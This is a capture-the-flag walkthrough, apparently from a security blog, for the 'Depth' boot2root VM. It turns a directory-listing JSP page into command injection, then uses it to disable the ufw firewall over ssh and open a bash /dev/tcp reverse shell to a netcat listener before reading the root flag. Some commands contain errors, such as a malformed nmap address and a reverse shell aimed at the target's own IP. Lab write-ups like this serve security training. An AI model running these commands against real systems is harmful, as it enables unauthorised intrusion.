Hello friends! Today we are going to take another CTF challenge known as Depth. The credit for making this vm machine goes to “Dan Lawson” and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.
Here, I have it at 192.168.1.135 but you may have a different one.
Let’s enumerate the ports using nmap
nmap -sV 192.168.135
Nmap scan shows us port 8080 is open, so we open it in our browser.
We don’t find anything on the index page, but nikto shows us a page called test.jsp.
nikto -h http://192.168.1.135:8080
We open it and find a page that it is used for looking into directories of the system.
We run ‘ls -al’ to check if it is working.
ls -al /tmp
When we take a look inside /home/ folder we find a user called bill.
ls -l /home
Now we find that site has a vulnerability we can change this utility into command injection. We find that with the help of ssh command we can bypass the firewall.
ssh [email protected] sudo -l
We find that we can run commands using ssh. Now we disable the firewall.
ssh [email protected] sudo ufw disable
Now to gain reverse shell we setup our listener using netcat.
nc -lvp 4444
After disabling the firewall, we use bash reverse shell to gain access.
ssh [email protected] bash -i >& /dev/tcp/192.168.1.135/4444 0>&1
Now as soon as we get reverse shell we go into root folder after entering root folder we get a file called flag.
We open the flag file and find a congratulatory message for the completion of the CTF challenge.
Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here